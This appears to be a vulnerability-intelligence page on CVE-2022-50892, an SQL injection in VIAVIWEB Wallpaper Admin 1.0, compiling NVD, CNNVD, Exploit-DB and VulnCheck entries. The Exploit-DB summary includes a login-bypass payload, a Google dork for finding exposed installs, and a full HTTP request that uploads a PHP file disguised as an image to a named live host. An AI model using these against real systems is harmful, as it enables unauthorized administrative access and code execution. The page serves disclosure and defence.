I. CVE-2022-50892: Basic Information
Vulnerability information
# VIAVIWEB Wallpaper Admin SQL Injection Vulnerability

N/A
                                        
Shenlong assessment

Web-class vulnerability: Unknown

Rationale:

N/A
Vulnerability title
VIAVIWEB Wallpaper Admin 1.0 - SQL Injection via Login Page
Source: U.S. National Vulnerability Database (NVD)
Vulnerability description
VIAVIWEB Wallpaper Admin 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating login credentials. Attackers can exploit the login page by injecting 'admin' or 1=1-- - payload to gain unauthorized access to the administrative interface.
Source: U.S. National Vulnerability Database (NVD)
CVSS information
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
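Source: U.S. National Vulnerability Database (NVD)
Vulnerability type
Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
Source: U.S. National Vulnerability Database (NVD)
Vulnerability title
VIAVIWEB Wallpaper Admin SQL Injection Vulnerability
Source: China National Vulnerability Database of Information Security (CNNVD)
Vulnerability description
VIAVIWEB Wallpaper Admin is a mobile-app back-end management system from the Indian company VIAVIWEB. VIAVIWEB Wallpaper Admin version 1.0 contains a SQL injection vulnerability. The vulnerability stems from SQL injection in the login credentials and may lead to authentication bypass.
Source: China National Vulnerability Database of Information Security (CNNVD)
CVSS information
N/A
Source: China National Vulnerability Database of Information Security (CNNVD)
Vulnerability type
SQL injection
Source: China National Vulnerability Database of Information Security (CNNVD)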
II. Public PoCs for CVE-2022-50892
# | PoC description | Source link | Shenlong link
III. Intelligence on CVE-2022-50892
  • https://www.viaviweb.com

    Tags: product
  • Title: VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities - PHP webapps Exploit -- 🔗 Source link

    Tags: exploit

    Shenlong quick read:
    ## Key vulnerability information
    
    - **EDB-ID:** 51033
    - **CVE:** N/A
    - **Author:** EDD13MORA
    - **Type:** WEBAPPS
    - **Platform:** PHP
    - **Date:** 2023-03-22
    - **Vulnerable App:** VIAVIWEB Wallpaper Admin 1.0
    
    ## Vulnerability details
    
    - **Exploit Title:** VIAVIWEB Wallpaper Admin 1.0 - Multiple Vulnerabilities
    - **Google Dork:** intext:"Wallpaper Admin" "LOGIN" "password" "Username"
    - **Date:** 18/09/2022
    - **Exploit Author:** Edd13Mora
    - **Vendor Homepage:** www.viaviweb.com
    - **Version:** N/A
    - **Tested on:** Windows 11 - Kali Linux
    
    ### Vulnerability description
    
    - **SQL Injection on the Login Page**
      - `payload --> admin' or 1=1-- -`
    
    ### Proof of Concept (POC)
    
    ```http
    POST /hd_wallpaper/add_gallery_image.php?add=yes HTTP/2
    Host: http://googlezik.freehostia.com
    Cookie: _octo=GH1.1.993736861.1663458698; PHPSESSID=qh3c29sbjr009jd8oraed4o52
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: multipart/form-data; boundary=--------------------------33893919268150571572221367848
    Content-Length: 467
    Origin: http://googlezik.freehostia.com
    Referer: http://googlezik.freehostia.com/hd_wallpaper/add_gallery_image.php?add=yes
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    Te: trailers
    
    --------------------------33893919268150571572221367848
    Content-Disposition: form-data; name="category_id"
    
    1
    --------------------------33893919268150571572221367848
    Content-Disposition: form-data; name="image[]"; filename="poc.php"
    Content-Type: image/png
    
    <?php phpinfo(); ?>
    --------------------------33893919268150571572221367848
    Content-Disposition: form-data; name="submit"
    
    --------------------------33893919268150571572221367848--
    ```
    
    ### Uploaded file location
    
    - `http://localhost/PAth-Where-Script-Installed/categories/`
                                            
  • Title: VIAVIWEB Wallpaper Admin 1.0 - SQL Injection via Login Page | Advisories | VulnCheck -- 🔗 Source link

    Tags: third-party-advisory

    Shenlong quick read:
    - **Severity**: High
    - **Date**: January 13, 2026
    - **Affecting**: VIAVIWEB Wallpaper Admin 1.0
    - **CVE**: CVE-2022-50892
    - **CWE**: CWE-89 Improper Neutralization of Special Elements used in an SQL Command ('SQL injection')
    - **CVSSv3**: 9.1 (AV:N/AC:L/PR:N/UI:N/SC:H/CI:H/IA:H)
    - **References**: 
      - [ExploitDB-51033](#)
      - [Vendor Homepage](#)
    - **Credit**: [Edd13Mora]
    - **Description**: VIAVIWEB Wallpaper Admin 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating login credentials. Attackers can exploit the login page by injecting 'admin' or 1=1-- - payload to gain unauthorized access to the administrative interface.
                                            
  • https://nvd.nist.gov/vuln/detail/CVE-2022-50892